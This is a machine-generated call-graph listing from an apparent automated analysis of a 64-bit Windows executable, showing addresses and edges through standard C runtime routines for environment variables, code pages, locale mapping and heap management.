7ff7102c3fe0 49 API calls 18134->18136 18159 7ff7102c5b63 18135->18159 18137 7ff7102c5b85 18136->18137 18138 7ff7102c5ba3 18137->18138 18139 7ff7102c25f0 53 API calls 18137->18139 18140 7ff7102c3f10 10 API calls 18138->18140 18139->18138 18142 7ff7102c5bad 18140->18142 18141 7ff7102cb870 _log10_special 8 API calls 18143 7ff7102c308e 18141->18143 18144 7ff7102c5bbb 18142->18144 18145 7ff7102c81a0 3 API calls 18142->18145 18143->16302 18160 7ff7102c5c80 18143->18160 18146 7ff7102c3fe0 49 API calls 18144->18146 18145->18144 18147 7ff7102c5bd4 18146->18147 18148 7ff7102c5bf9 18147->18148 18149 7ff7102c5bd9 18147->18149 18151 7ff7102c81a0 3 API calls 18148->18151 18150 7ff7102c25f0 53 API calls 18149->18150 18150->18159 18152 7ff7102c5c06 18151->18152 18159->18141 18299 7ff7102c4c80 18160->18299 18162 7ff7102c5cba 18163 7ff7102c5cc2 18162->18163 18164 7ff7102c5cd3 18162->18164 18165 7ff7102c25f0 53 API calls 18163->18165 18306 7ff7102c4450 18164->18306 18301 7ff7102c4cac 18299->18301 18300 7ff7102c4cb4 18300->18162 18301->18300 18304 7ff7102c4e54 18301->18304 18337 7ff7102d5db4 18301->18337 18302 7ff7102c5017 __vcrt_freefls 18302->18162 18303 7ff7102c4180 47 API calls 18303->18304 18304->18302 18304->18303 18307 7ff7102c4480 18306->18307 18338 7ff7102d5de4 18337->18338 18341 7ff7102d52b0 18338->18341 18342 7ff7102d52f3 18341->18342 18343 7ff7102d52e1 18341->18343 18417->16310 18419 7ff7102da460 __CxxCallCatchBlock 45 API calls 18418->18419 18420 7ff7102d96f1 18419->18420 18423 7ff7102d9814 18420->18423 18432 7ff7102e2960 18423->18432 18458 7ff7102e2918 18432->18458 18463 7ff7102df5e8 EnterCriticalSection 18458->18463 18467 7ff7102dfbd8 18468 7ff7102dfbfc 18467->18468 18470 7ff7102dfc0c 18467->18470 18469 7ff7102d43f4 _get_daylight 11 API calls 18468->18469 18492 7ff7102dfc01 18469->18492 18471 7ff7102dfeec 18470->18471 18472 7ff7102dfc2e 18470->18472 18473 7ff7102d43f4 _get_daylight 11 API calls 18471->18473 18474 7ff7102dfc4f 18472->18474 18607 7ff7102e0294 18472->18607 18475 7ff7102dfef1 18473->18475 18478 7ff7102dfcc1 18474->18478 18479 7ff7102dfc75 18474->18479 18484 7ff7102dfcb5 18474->18484 18477 7ff7102d9c58 __free_lconv_num 11 API calls 18475->18477 18477->18492 18481 7ff7102ddea8 _get_daylight 11 API calls 18478->18481 18496 7ff7102dfc84 18478->18496 18622 7ff7102d89d8 18479->18622 18480 7ff7102dfd6e 18491 7ff7102dfd8b 18480->18491 18497 7ff7102dfddd 18480->18497 18485 7ff7102dfcd7 18481->18485 18484->18480 18484->18496 18628 7ff7102e643c 18484->18628 18488 7ff7102d9c58 __free_lconv_num 11 API calls 18485->18488 18487 7ff7102d9c58 __free_lconv_num 11 API calls 18487->18492 18493 7ff7102dfce5 18488->18493 18489 7ff7102dfc7f 18494 7ff7102d43f4 _get_daylight 11 API calls 18489->18494 18490 7ff7102dfc9d 18490->18484 18499 7ff7102e0294 45 API calls 18490->18499 18495 7ff7102d9c58 __free_lconv_num 11 API calls 18491->18495 18493->18484 18493->18496 18501 7ff7102ddea8 _get_daylight 11 API calls 18493->18501 18494->18496 18498 7ff7102dfd94 18495->18498 18496->18487 18497->18496 18500 7ff7102e26ec 40 API calls 18497->18500 18505 7ff7102e26ec 40 API calls 18498->18505 18507 7ff7102dfd99 18498->18507 18499->18484 18502 7ff7102dfe1a 18500->18502 18503 7ff7102dfd07 18501->18503 18504 7ff7102d9c58 __free_lconv_num 11 API calls 18502->18504 18509 7ff7102d9c58 __free_lconv_num 11 API calls 18503->18509 18510 7ff7102dfe24 18504->18510 18508 7ff7102dfdc5 18505->18508 18506 7ff7102dfee0 18512 7ff7102d9c58 __free_lconv_num 11 API calls 18506->18512 18507->18506 18513 7ff7102ddea8 _get_daylight 11 API calls 18507->18513 18511 7ff7102d9c58 __free_lconv_num 11 API calls 18508->18511 18509->18484 18510->18496 18510->18507 18511->18507 18512->18492 18514 7ff7102dfe68 18513->18514 18515 7ff7102dfe70 18514->18515 18516 7ff7102dfe79 18514->18516 18517 7ff7102d9c58 __free_lconv_num 11 API calls 18515->18517 18518 7ff7102d97b4 __std_exception_copy 37 API calls 18516->18518 18519 7ff7102dfe77 18517->18519 18520 7ff7102dfe88 18518->18520 18524 7ff7102d9c58 __free_lconv_num 11 API calls 18519->18524 18521 7ff7102dfe90 18520->18521 18522 7ff7102dff1b 18520->18522 18664 7ff7102e6554 18521->18664 18523 7ff7102d9c10 _isindst 17 API calls 18522->18523 18526 7ff7102dff2f 18523->18526 18524->18492 18528 7ff7102dff58 18526->18528 18537 7ff7102dff68 18526->18537 18531 7ff7102d43f4 _get_daylight 11 API calls 18528->18531 18529 7ff7102dfed8 18532 7ff7102d9c58 __free_lconv_num 11 API calls 18529->18532 18530 7ff7102dfeb7 18533 7ff7102d43f4 _get_daylight 11 API calls 18530->18533 18535 7ff7102dff5d 18531->18535 18532->18506 18534 7ff7102dfebc 18533->18534 18536 7ff7102d9c58 __free_lconv_num 11 API calls 18534->18536 18536->18519 18538 7ff7102e024b 18537->18538 18539 7ff7102dff8a 18537->18539 18540 7ff7102d43f4 _get_daylight 11 API calls 18538->18540 18541 7ff7102dffa7 18539->18541 18683 7ff7102e037c 18539->18683 18542 7ff7102e0250 18540->18542 18545 7ff7102e001b 18541->18545 18547 7ff7102dffcf 18541->18547 18551 7ff7102e000f 18541->18551 18544 7ff7102d9c58 __free_lconv_num 11 API calls 18542->18544 18544->18535 18549 7ff7102e0043 18545->18549 18552 7ff7102ddea8 _get_daylight 11 API calls 18545->18552 18565 7ff7102dffde 18545->18565 18546 7ff7102e00ce 18560 7ff7102e00eb 18546->18560 18566 7ff7102e013e 18546->18566 18698 7ff7102d8a14 18547->18698 18549->18551 18554 7ff7102ddea8 _get_daylight 11 API calls 18549->18554 18549->18565 18551->18546 18551->18565 18704 7ff7102e62fc 18551->18704 18556 7ff7102e0035 18552->18556 18559 7ff7102e0065 18554->18559 18555 7ff7102d9c58 __free_lconv_num 11 API calls 18555->18535 18561 7ff7102d9c58 __free_lconv_num 11 API calls 18556->18561 18557 7ff7102dfff7 18557->18551 18567 7ff7102e037c 45 API calls 18557->18567 18558 7ff7102dffd9 18562 7ff7102d43f4 _get_daylight 11 API calls 18558->18562 18563 7ff7102d9c58 __free_lconv_num 11 API calls 18559->18563 18564 7ff7102d9c58 __free_lconv_num 11 API calls 18560->18564 18561->18549 18562->18565 18563->18551 18569 7ff7102e00f4 18564->18569 18565->18555 18566->18565 18598 7ff7102e26ec 18566->18598 18567->18551 18571 7ff7102e26ec 40 API calls 18569->18571 18577 7ff7102e00fa 18569->18577 18570 7ff7102e017c 18572 7ff7102d9c58 __free_lconv_num 11 API calls 18570->18572 18573 7ff7102e0126 18571->18573 18575 7ff7102e0186 18572->18575 18576 7ff7102d9c58 __free_lconv_num 11 API calls 18573->18576 18574 7ff7102e023f 18578 7ff7102d9c58 __free_lconv_num 11 API calls 18574->18578 18575->18565 18575->18577 18576->18577 18577->18574 18577->18577 18579 7ff7102ddea8 _get_daylight 11 API calls 18577->18579 18578->18535 18580 7ff7102e01cb 18579->18580 18581 7ff7102e01d3 18580->18581 18582 7ff7102e01dc 18580->18582 18583 7ff7102d9c58 __free_lconv_num 11 API calls 18581->18583 18584 7ff7102df784 37 API calls 18582->18584 18585 7ff7102e01da 18583->18585 18586 7ff7102e01ea 18584->18586 18590 7ff7102d9c58 __free_lconv_num 11 API calls 18585->18590 18587 7ff7102e027f 18586->18587 18588 7ff7102e01f2 SetEnvironmentVariableW 18586->18588 18589 7ff7102d9c10 _isindst 17 API calls 18587->18589 18591 7ff7102e0216 18588->18591 18592 7ff7102e0237 18588->18592 18593 7ff7102e0293 18589->18593 18590->18535 18595 7ff7102d43f4 _get_daylight 11 API calls 18591->18595 18594 7ff7102d9c58 __free_lconv_num 11 API calls 18592->18594 18594->18574 18596 7ff7102e021b 18595->18596 18597 7ff7102d9c58 __free_lconv_num 11 API calls 18596->18597 18597->18585 18599 7ff7102e272b 18598->18599 18600 7ff7102e270e 18598->18600 18602 7ff7102e2735 18599->18602 18740 7ff7102e6f48 18599->18740 18600->18599 18601 7ff7102e271c 18600->18601 18603 7ff7102d43f4 _get_daylight 11 API calls 18601->18603 18728 7ff7102e6f84 18602->18728 18606 7ff7102e2721 memcpy_s 18603->18606 18606->18570 18608 7ff7102e02b1 18607->18608 18609 7ff7102e02c9 18607->18609 18608->18474 18610 7ff7102ddea8 _get_daylight 11 API calls 18609->18610 18616 7ff7102e02ed 18610->18616 18611 7ff7102d9814 __CxxCallCatchBlock 45 API calls 18613 7ff7102e0378 18611->18613 18612 7ff7102e034e 18614 7ff7102d9c58 __free_lconv_num 11 API calls 18612->18614 18614->18608 18615 7ff7102ddea8 _get_daylight 11 API calls 18615->18616 18616->18612 18616->18615 18617 7ff7102d9c58 __free_lconv_num 11 API calls 18616->18617 18618 7ff7102d97b4 __std_exception_copy 37 API calls 18616->18618 18619 7ff7102e035d 18616->18619 18621 7ff7102e0372 18616->18621 18617->18616 18618->18616 18620 7ff7102d9c10 _isindst 17 API calls 18619->18620 18620->18621 18621->18611 18623 7ff7102d89f1 18622->18623 18624 7ff7102d89e8 18622->18624 18623->18489 18623->18490 18624->18623 18747 7ff7102d84b0 18624->18747 18629 7ff7102e5564 18628->18629 18630 7ff7102e6449 18628->18630 18631 7ff7102e5571 18629->18631 18639 7ff7102e55a7 18629->18639 18632 7ff7102d4178 45 API calls 18630->18632 18634 7ff7102d43f4 _get_daylight 11 API calls 18631->18634 18651 7ff7102e5518 18631->18651 18633 7ff7102e647d 18632->18633 18636 7ff7102e6482 18633->18636 18640 7ff7102e6493 18633->18640 18644 7ff7102e64aa 18633->18644 18637 7ff7102e557b 18634->18637 18635 7ff7102e55d1 18638 7ff7102d43f4 _get_daylight 11 API calls 18635->18638 18636->18484 18641 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 18637->18641 18642 7ff7102e55d6 18638->18642 18639->18635 18643 7ff7102e55f6 18639->18643 18645 7ff7102d43f4 _get_daylight 11 API calls 18640->18645 18646 7ff7102e5586 18641->18646 18647 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 18642->18647 18652 7ff7102d4178 45 API calls 18643->18652 18655 7ff7102e55e1 18643->18655 18649 7ff7102e64b4 18644->18649 18650 7ff7102e64c6 18644->18650 18648 7ff7102e6498 18645->18648 18646->18484 18647->18655 18656 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 18648->18656 18657 7ff7102d43f4 _get_daylight 11 API calls 18649->18657 18653 7ff7102e64ee 18650->18653 18654 7ff7102e64d7 18650->18654 18651->18484 18652->18655 18989 7ff7102e825c 18653->18989 18980 7ff7102e55b4 18654->18980 18655->18484 18656->18636 18660 7ff7102e64b9 18657->18660 18662 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 18660->18662 18662->18636 18663 7ff7102d43f4 _get_daylight 11 API calls 18663->18636 18665 7ff7102d4178 45 API calls 18664->18665 18666 7ff7102e65ba 18665->18666 18667 7ff7102e65c8 18666->18667 19029 7ff7102de234 18666->19029 19032 7ff7102d47bc 18667->19032 18671 7ff7102e66b4 18674 7ff7102e66c5 18671->18674 18675 7ff7102d9c58 __free_lconv_num 11 API calls 18671->18675 18672 7ff7102d4178 45 API calls 18673 7ff7102e6637 18672->18673 18677 7ff7102de234 5 API calls 18673->18677 18680 7ff7102e6640 18673->18680 18676 7ff7102dfeb3 18674->18676 18678 7ff7102d9c58 __free_lconv_num 11 API calls 18674->18678 18675->18674 18676->18529 18676->18530 18677->18680 18678->18676 18679 7ff7102d47bc 14 API calls 18681 7ff7102e669b 18679->18681 18680->18679 18681->18671 18682 7ff7102e66a3 SetEnvironmentVariableW 18681->18682 18682->18671 18684 7ff7102e03bc 18683->18684 18691 7ff7102e039f 18683->18691 18685 7ff7102ddea8 _get_daylight 11 API calls 18684->18685 18686 7ff7102e03e0 18685->18686 18688 7ff7102e0441 18686->18688 18692 7ff7102ddea8 _get_daylight 11 API calls 18686->18692 18693 7ff7102d9c58 __free_lconv_num 11 API calls 18686->18693 18694 7ff7102df784 37 API calls 18686->18694 18695 7ff7102e0450 18686->18695 18697 7ff7102e0464 18686->18697 18687 7ff7102d9814 __CxxCallCatchBlock 45 API calls 18689 7ff7102e046a 18687->18689 18690 7ff7102d9c58 __free_lconv_num 11 API calls 18688->18690 18690->18691 18691->18541 18692->18686 18693->18686 18694->18686 18696 7ff7102d9c10 _isindst 17 API calls 18695->18696 18696->18697 18697->18687 18699 7ff7102d8a24 18698->18699 18700 7ff7102d8a2d 18698->18700 18699->18700 19054 7ff7102d8524 18699->19054 18700->18557 18700->18558 18705 7ff7102e6309 18704->18705 18708 7ff7102e6336 18704->18708 18706 7ff7102e630e 18705->18706 18705->18708 18707 7ff7102d43f4 _get_daylight 11 API calls 18706->18707 18710 7ff7102e6313 18707->18710 18709 7ff7102e637a 18708->18709 18712 7ff7102e6399 18708->18712 18725 7ff7102e636e __crtLCMapStringW 18708->18725 18711 7ff7102d43f4 _get_daylight 11 API calls 18709->18711 18713 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 18710->18713 18714 7ff7102e637f 18711->18714 18715 7ff7102e63a3 18712->18715 18716 7ff7102e63b5 18712->18716 18717 7ff7102e631e 18713->18717 18718 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 18714->18718 18719 7ff7102d43f4 _get_daylight 11 API calls 18715->18719 18720 7ff7102d4178 45 API calls 18716->18720 18717->18551 18718->18725 18721 7ff7102e63a8 18719->18721 18722 7ff7102e63c2 18720->18722 18723 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 18721->18723 18722->18725 19101 7ff7102e7e18 18722->19101 18723->18725 18725->18551 18727 7ff7102d43f4 _get_daylight 11 API calls 18727->18725 18729 7ff7102e6fa3 18728->18729 18730 7ff7102e6f99 18728->18730 18732 7ff7102e6fa8 18729->18732 18738 7ff7102e6faf _get_daylight 18729->18738 18731 7ff7102dc90c _fread_nolock 12 API calls 18730->18731 18736 7ff7102e6fa1 18731->18736 18733 7ff7102d9c58 __free_lconv_num 11 API calls 18732->18733 18733->18736 18734 7ff7102e6fb5 18737 7ff7102d43f4 _get_daylight 11 API calls 18734->18737 18735 7ff7102e6fe2 RtlReAllocateHeap 18735->18736 18735->18738 18736->18606 18737->18736 18738->18734 18738->18735 18739 7ff7102e28a0 _get_daylight 2 API calls 18738->18739 18739->18738 18741 7ff7102e6f51 18740->18741 18742 7ff7102e6f6a HeapSize 18740->18742 18743 7ff7102d43f4 _get_daylight 11 API calls 18741->18743 18744 7ff7102e6f56 18743->18744 18745 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 18744->18745 18746 7ff7102e6f61 18745->18746 18746->18602 18748 7ff7102d84c5 18747->18748 18749 7ff7102d84c9 18747->18749 18748->18623 18762 7ff7102d8804 18748->18762 18770 7ff7102e1900 18749->18770 18754 7ff7102d84db 18756 7ff7102d9c58 __free_lconv_num 11 API calls 18754->18756 18755 7ff7102d84e7 18796 7ff7102d8594 18755->18796 18756->18748 18759 7ff7102d9c58 __free_lconv_num 11 API calls 18760 7ff7102d850e 18759->18760 18761 7ff7102d9c58 __free_lconv_num 11 API calls 18760->18761 18761->18748 18763 7ff7102d882d 18762->18763 18768 7ff7102d8846 18762->18768 18763->18623 18764 7ff7102ddea8 _get_daylight 11 API calls 18764->18768 18765 7ff7102d88d6 18767 7ff7102d9c58 __free_lconv_num 11 API calls 18765->18767 18766 7ff7102dfaf8 WideCharToMultiByte 18766->18768 18767->18763 18768->18763 18768->18764 18768->18765 18768->18766 18769 7ff7102d9c58 __free_lconv_num 11 API calls 18768->18769 18769->18768 18771 7ff7102e190d 18770->18771 18772 7ff7102d84ce 18770->18772 18815 7ff7102da534 18771->18815 18776 7ff7102e1c3c GetEnvironmentStringsW 18772->18776 18777 7ff7102d84d3 18776->18777 18778 7ff7102e1c6c 18776->18778 18777->18754 18777->18755 18779 7ff7102dfaf8 WideCharToMultiByte 18778->18779 18780 7ff7102e1cbd 18779->18780 18781 7ff7102e1cc4 FreeEnvironmentStringsW 18780->18781 18782 7ff7102dc90c _fread_nolock 12 API calls 18780->18782 18781->18777 18783 7ff7102e1cd7 18782->18783 18784 7ff7102e1cdf 18783->18784 18785 7ff7102e1ce8 18783->18785 18787 7ff7102d9c58 __free_lconv_num 11 API calls 18784->18787 18786 7ff7102dfaf8 WideCharToMultiByte 18785->18786 18788 7ff7102e1d0b 18786->18788 18789 7ff7102e1ce6 18787->18789 18790 7ff7102e1d0f 18788->18790 18791 7ff7102e1d19 18788->18791 18789->18781 18792 7ff7102d9c58 __free_lconv_num 11 API calls 18790->18792 18793 7ff7102d9c58 __free_lconv_num 11 API calls 18791->18793 18794 7ff7102e1d17 FreeEnvironmentStringsW 18792->18794 18793->18794 18794->18777 18797 7ff7102d85b9 18796->18797 18798 7ff7102ddea8 _get_daylight 11 API calls 18797->18798 18811 7ff7102d85ef 18798->18811 18799 7ff7102d85f7 18800 7ff7102d9c58 __free_lconv_num 11 API calls 18799->18800 18801 7ff7102d84ef 18800->18801 18801->18759 18802 7ff7102d866a 18803 7ff7102d9c58 __free_lconv_num 11 API calls 18802->18803 18803->18801 18804 7ff7102ddea8 _get_daylight 11 API calls 18804->18811 18805 7ff7102d8659 18974 7ff7102d87c0 18805->18974 18807 7ff7102d97b4 __std_exception_copy 37 API calls 18807->18811 18809 7ff7102d9c58 __free_lconv_num 11 API calls 18809->18799 18810 7ff7102d868f 18813 7ff7102d9c10 _isindst 17 API calls 18810->18813 18811->18799 18811->18802 18811->18804 18811->18805 18811->18807 18811->18810 18812 7ff7102d9c58 __free_lconv_num 11 API calls 18811->18812 18812->18811 18814 7ff7102d86a2 18813->18814 18816 7ff7102da545 FlsGetValue 18815->18816 18817 7ff7102da560 FlsSetValue 18815->18817 18818 7ff7102da552 18816->18818 18819 7ff7102da55a 18816->18819 18817->18818 18820 7ff7102da56d 18817->18820 18821 7ff7102da558 18818->18821 18822 7ff7102d9814 __CxxCallCatchBlock 45 API calls 18818->18822 18819->18817 18823 7ff7102ddea8 _get_daylight 11 API calls 18820->18823 18835 7ff7102e15d4 18821->18835 18824 7ff7102da5d5 18822->18824 18825 7ff7102da57c 18823->18825 18826 7ff7102da59a FlsSetValue 18825->18826 18827 7ff7102da58a FlsSetValue 18825->18827 18828 7ff7102da5a6 FlsSetValue 18826->18828 18829 7ff7102da5b8 18826->18829 18830 7ff7102da593 18827->18830 18828->18830 18832 7ff7102da204 _get_daylight 11 API calls 18829->18832 18831 7ff7102d9c58 __free_lconv_num 11 API calls 18830->18831 18831->18818 18833 7ff7102da5c0 18832->18833 18834 7ff7102d9c58 __free_lconv_num 11 API calls 18833->18834 18834->18821 18858 7ff7102e1844 18835->18858 18837 7ff7102e1609 18873 7ff7102e12d4 18837->18873 18840 7ff7102dc90c _fread_nolock 12 API calls 18841 7ff7102e1637 18840->18841 18842 7ff7102e163f 18841->18842 18845 7ff7102e164e 18841->18845 18843 7ff7102d9c58 __free_lconv_num 11 API calls 18842->18843 18844 7ff7102e1626 18843->18844 18844->18772 18880 7ff7102e197c 18845->18880 18848 7ff7102e174a 18849 7ff7102d43f4 _get_daylight 11 API calls 18848->18849 18851 7ff7102e174f 18849->18851 18850 7ff7102e17a5 18853 7ff7102e180c 18850->18853 18891 7ff7102e1104 18850->18891 18854 7ff7102d9c58 __free_lconv_num 11 API calls 18851->18854 18852 7ff7102e1764 18852->18850 18855 7ff7102d9c58 __free_lconv_num 11 API calls 18852->18855 18857 7ff7102d9c58 __free_lconv_num 11 API calls 18853->18857 18854->18844 18855->18850 18857->18844 18859 7ff7102e1867 18858->18859 18861 7ff7102e1871 18859->18861 18906 7ff7102df5e8 EnterCriticalSection 18859->18906 18862 7ff7102e18e3 18861->18862 18865 7ff7102d9814 __CxxCallCatchBlock 45 API calls 18861->18865 18862->18837 18866 7ff7102e18fb 18865->18866 18869 7ff7102e1952 18866->18869 18870 7ff7102da534 50 API calls 18866->18870 18869->18837 18871 7ff7102e193c 18870->18871 18872 7ff7102e15d4 65 API calls 18871->18872 18872->18869 18874 7ff7102d4178 45 API calls 18873->18874 18875 7ff7102e12e8 18874->18875 18876 7ff7102e12f4 GetOEMCP 18875->18876 18877 7ff7102e1306 18875->18877 18879 7ff7102e131b 18876->18879 18878 7ff7102e130b GetACP 18877->18878 18877->18879 18878->18879 18879->18840 18879->18844 18881 7ff7102e12d4 47 API calls 18880->18881 18883 7ff7102e19a9 18881->18883 18882 7ff7102e1aff 18885 7ff7102cb870 _log10_special 8 API calls 18882->18885 18883->18882 18884 7ff7102e19e6 IsValidCodePage 18883->18884 18887 7ff7102e1a00 memcpy_s 18883->18887 18884->18882 18888 7ff7102e19f7 18884->18888 18886 7ff7102e1741 18885->18886 18886->18848 18886->18852 18907 7ff7102e13ec 18887->18907 18888->18887 18889 7ff7102e1a26 GetCPInfo 18888->18889 18889->18882 18889->18887 18973 7ff7102df5e8 EnterCriticalSection 18891->18973 18908 7ff7102e1429 GetCPInfo 18907->18908 18909 7ff7102e151f 18907->18909 18908->18909 18914 7ff7102e143c 18908->18914 18910 7ff7102cb870 _log10_special 8 API calls 18909->18910 18911 7ff7102e15be 18910->18911 18911->18882 18912 7ff7102e2150 48 API calls 18913 7ff7102e14b3 18912->18913 18918 7ff7102e6e94 18913->18918 18914->18912 18917 7ff7102e6e94 54 API calls 18917->18909 18919 7ff7102d4178 45 API calls 18918->18919 18920 7ff7102e6eb9 18919->18920 18923 7ff7102e6b60 18920->18923 18924 7ff7102e6ba1 18923->18924 18925 7ff7102debb0 _fread_nolock MultiByteToWideChar 18924->18925 18928 7ff7102e6beb 18925->18928 18926 7ff7102e6e69 18927 7ff7102cb870 _log10_special 8 API calls 18926->18927 18929 7ff7102e14e6 18927->18929 18928->18926 18930 7ff7102dc90c _fread_nolock 12 API calls 18928->18930 18931 7ff7102e6d21 18928->18931 18933 7ff7102e6c23 18928->18933 18929->18917 18930->18933 18931->18926 18932 7ff7102d9c58 __free_lconv_num 11 API calls 18931->18932 18932->18926 18933->18931 18934 7ff7102debb0 _fread_nolock MultiByteToWideChar 18933->18934 18935 7ff7102e6c96 18934->18935 18935->18931 18954 7ff7102de3f4 18935->18954 18938 7ff7102e6d32 18940 7ff7102dc90c _fread_nolock 12 API calls 18938->18940 18942 7ff7102e6e04 18938->18942 18944 7ff7102e6d50 18938->18944 18939 7ff7102e6ce1 18939->18931 18941 7ff7102de3f4 __crtLCMapStringW 6 API calls 18939->18941 18940->18944 18941->18931 18942->18931 18943 7ff7102d9c58 __free_lconv_num 11 API calls 18942->18943 18943->18931 18944->18931 18945 7ff7102de3f4 __crtLCMapStringW 6 API calls 18944->18945 18946 7ff7102e6dd0 18945->18946 18946->18942 18947 7ff7102e6e06 18946->18947 18948 7ff7102e6df0 18946->18948 18950 7ff7102dfaf8 WideCharToMultiByte 18947->18950 18949 7ff7102dfaf8 WideCharToMultiByte 18948->18949 18951 7ff7102e6dfe 18949->18951 18950->18951 18951->18942 18952 7ff7102e6e1e 18951->18952 18952->18931 18953 7ff7102d9c58 __free_lconv_num 11 API calls 18952->18953 18953->18931 18960 7ff7102de020 18954->18960 18957 7ff7102de43a 18957->18931 18957->18938 18957->18939 18959 7ff7102de4a3 LCMapStringW 18959->18957 18961 7ff7102de07d 18960->18961 18962 7ff7102de078 __vcrt_InitializeCriticalSectionEx 18960->18962 18961->18957 18970 7ff7102de4e0 18961->18970 18962->18961 18963 7ff7102de0ad LoadLibraryExW 18962->18963 18964 7ff7102de1a2 GetProcAddress 18962->18964 18969 7ff7102de10c LoadLibraryExW 18962->18969 18965 7ff7102de182 18963->18965 18966 7ff7102de0d2 GetLastError 18963->18966 18964->18961 18968 7ff7102de1b3 18964->18968 18965->18964 18967 7ff7102de199 FreeLibrary 18965->18967 18966->18962 18967->18964 18968->18961 18969->18962 18969->18965 18971 7ff7102de020 __crtLCMapStringW 5 API calls 18970->18971 18972 7ff7102de50e __crtLCMapStringW 18971->18972 18972->18959 18975 7ff7102d87c5 18974->18975 18976 7ff7102d8661 18974->18976 18977 7ff7102d87ee 18975->18977 18978 7ff7102d9c58 __free_lconv_num 11 API calls 18975->18978 18976->18809 18979 7ff7102d9c58 __free_lconv_num 11 API calls 18977->18979 18978->18975 18979->18976 18981 7ff7102e55d1 18980->18981 18982 7ff7102e55e8 18980->18982 18983 7ff7102d43f4 _get_daylight 11 API calls 18981->18983 18982->18981 18985 7ff7102e55f6 18982->18985 18984 7ff7102e55d6 18983->18984 18986 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 18984->18986 18987 7ff7102d4178 45 API calls 18985->18987 18988 7ff7102e55e1 18985->18988 18986->18988 18987->18988 18988->18636 18990 7ff7102d4178 45 API calls 18989->18990 18991 7ff7102e8281 18990->18991 18994 7ff7102e7ed8 18991->18994 18997 7ff7102e7f26 18994->18997 18995 7ff7102cb870 _log10_special 8 API calls 18996 7ff7102e6515 18995->18996 18996->18636 18996->18663 18998 7ff7102e7fad 18997->18998 19000 7ff7102e7f98 GetCPInfo 18997->19000 19003 7ff7102e7fb1 18997->19003 18999 7ff7102debb0 _fread_nolock MultiByteToWideChar 18998->18999 18998->19003 19001 7ff7102e8045 18999->19001 19000->18998 19000->19003 19002 7ff7102dc90c _fread_nolock 12 API calls 19001->19002 19001->19003 19004 7ff7102e807c 19001->19004 19002->19004 19003->18995 19004->19003 19005 7ff7102debb0 _fread_nolock MultiByteToWideChar 19004->19005 19006 7ff7102e80ea 19005->19006 19007 7ff7102e81cc 19006->19007 19008 7ff7102debb0 _fread_nolock MultiByteToWideChar 19006->19008 19007->19003 19009 7ff7102d9c58 __free_lconv_num 11 API calls 19007->19009 19010 7ff7102e8110 19008->19010 19009->19003 19010->19007 19011 7ff7102dc90c _fread_nolock 12 API calls 19010->19011 19012 7ff7102e813d 19010->19012 19011->19012 19012->19007 19013 7ff7102debb0 _fread_nolock MultiByteToWideChar 19012->19013 19014 7ff7102e81b4 19013->19014 19015 7ff7102e81d4 19014->19015 19016 7ff7102e81ba 19014->19016 19023 7ff7102de278 19015->19023 19016->19007 19018 7ff7102d9c58 __free_lconv_num 11 API calls 19016->19018 19018->19007 19020 7ff7102e8213 19020->19003 19022 7ff7102d9c58 __free_lconv_num 11 API calls 19020->19022 19021 7ff7102d9c58 __free_lconv_num 11 API calls 19021->19020 19022->19003 19024 7ff7102de020 __crtLCMapStringW 5 API calls 19023->19024 19025 7ff7102de2b6 19024->19025 19026 7ff7102de2be 19025->19026 19027 7ff7102de4e0 __crtLCMapStringW 5 API calls 19025->19027 19026->19020 19026->19021 19028 7ff7102de327 CompareStringW 19027->19028 19028->19026 19030 7ff7102de020 __crtLCMapStringW 5 API calls 19029->19030 19031 7ff7102de254 19030->19031 19031->18667 19033 7ff7102d47e6 19032->19033 19034 7ff7102d480a 19032->19034 19037 7ff7102d47f5 19033->19037 19039 7ff7102d9c58 __free_lconv_num 11 API calls 19033->19039 19035 7ff7102d4864 19034->19035 19036 7ff7102d480f 19034->19036 19038 7ff7102debb0 _fread_nolock MultiByteToWideChar 19035->19038 19036->19037 19040 7ff7102d4824 19036->19040 19041 7ff7102d9c58 __free_lconv_num 11 API calls 19036->19041 19037->18671 19037->18672 19045 7ff7102d4880 19038->19045 19039->19037 19042 7ff7102dc90c _fread_nolock 12 API calls 19040->19042 19041->19040 19042->19037 19043 7ff7102d4887 GetLastError 19044 7ff7102d4368 _fread_nolock 11 API calls 19043->19044 19047 7ff7102d4894 19044->19047 19045->19043 19048 7ff7102d9c58 __free_lconv_num 11 API calls 19045->19048 19052 7ff7102d48b5 19045->19052 19053 7ff7102d48c2 19045->19053 19046 7ff7102debb0 _fread_nolock MultiByteToWideChar 19050 7ff7102d4906 19046->19050 19051 7ff7102d43f4 _get_daylight 11 API calls 19047->19051 19048->19052 19049 7ff7102dc90c _fread_nolock 12 API calls 19049->19053 19050->19037 19050->19043 19051->19037 19052->19049 19053->19037 19053->19046 19055 7ff7102d853d 19054->19055 19056 7ff7102d8539 19054->19056 19075 7ff7102e1d4c GetEnvironmentStringsW 19055->19075 19056->18700 19067 7ff7102d88e4 19056->19067 19059 7ff7102d8556 19082 7ff7102d86a4 19059->19082 19060 7ff7102d854a 19062 7ff7102d9c58 __free_lconv_num 11 API calls 19060->19062 19062->19056 19064 7ff7102d9c58 __free_lconv_num 11 API calls 19065 7ff7102d857d 19064->19065 19066 7ff7102d9c58 __free_lconv_num 11 API calls 19065->19066 19066->19056 19068 7ff7102d8907 19067->19068 19073 7ff7102d891e 19067->19073 19068->18700 19069 7ff7102debb0 MultiByteToWideChar _fread_nolock 19069->19073 19070 7ff7102ddea8 _get_daylight 11 API calls 19070->19073 19071 7ff7102d8992 19072 7ff7102d9c58 __free_lconv_num 11 API calls 19071->19072 19072->19068 19073->19068 19073->19069 19073->19070 19073->19071 19074 7ff7102d9c58 __free_lconv_num 11 API calls 19073->19074 19074->19073 19076 7ff7102d8542 19075->19076 19078 7ff7102e1d70 19075->19078 19076->19059 19076->19060 19077 7ff7102dc90c _fread_nolock 12 API calls 19079 7ff7102e1da7 memcpy_s 19077->19079 19078->19077 19078->19078 19080 7ff7102d9c58 __free_lconv_num 11 API calls 19079->19080 19081 7ff7102e1dc7 FreeEnvironmentStringsW 19080->19081 19081->19076 19083 7ff7102d86cc 19082->19083 19084 7ff7102ddea8 _get_daylight 11 API calls 19083->19084 